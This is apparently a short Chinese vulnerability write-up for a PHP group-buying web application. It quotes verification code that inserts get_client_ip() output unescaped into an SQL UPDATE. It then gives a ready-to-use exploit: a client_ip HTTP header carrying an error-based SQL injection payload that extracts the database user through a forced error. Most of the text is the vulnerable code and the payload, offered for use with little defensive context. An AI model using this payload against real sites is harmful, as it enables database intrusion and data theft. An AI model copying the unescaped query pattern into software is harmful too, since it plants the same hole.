if($_REQUEST['act']=='verify'){
$id = intval($_REQUEST['id']);
$user_info = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."user where id = ".$id);if(!$user_info){
showErr($GLOBALS['lang']['NO_THIS_USER']);}
$verify = $_REQUEST['code'];if($user_info['verify']== $verify){//成功
$_SESSION['user_info']= $user_info;
$GLOBALS['db']->query("update ".DB_PREFIX."user set login_ip = '".get_client_ip()."',login_time= ".get_gmtime().",verify = '',is_effect = 1 where id =".$user_info['id']);
$GLOBALS['db']->query("update ".DB_PREFIX."mail_list set is_effect = 1 where mail_address ='".$user_info['email']."'");
$GLOBALS['db']->query("update ".DB_PREFIX."mobile_list set is_effect = 1 where mobile ='".$user_info['mobile']."'");
showSuccess($GLOBALS['lang']['VERIFY_SUCCESS'],0,APP_ROOT."/");}
团购系统嘛,其实不用看代码,登陆的这些地方必定会用这个函数。
果断的,登陆的时候在http头里面加了个client_ip,值为127′
看图:
报错注入,很简单吧,
exp:
火狐插件增加client_ip头部,对应值为
‘and(select*from(select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables groupby a)b)#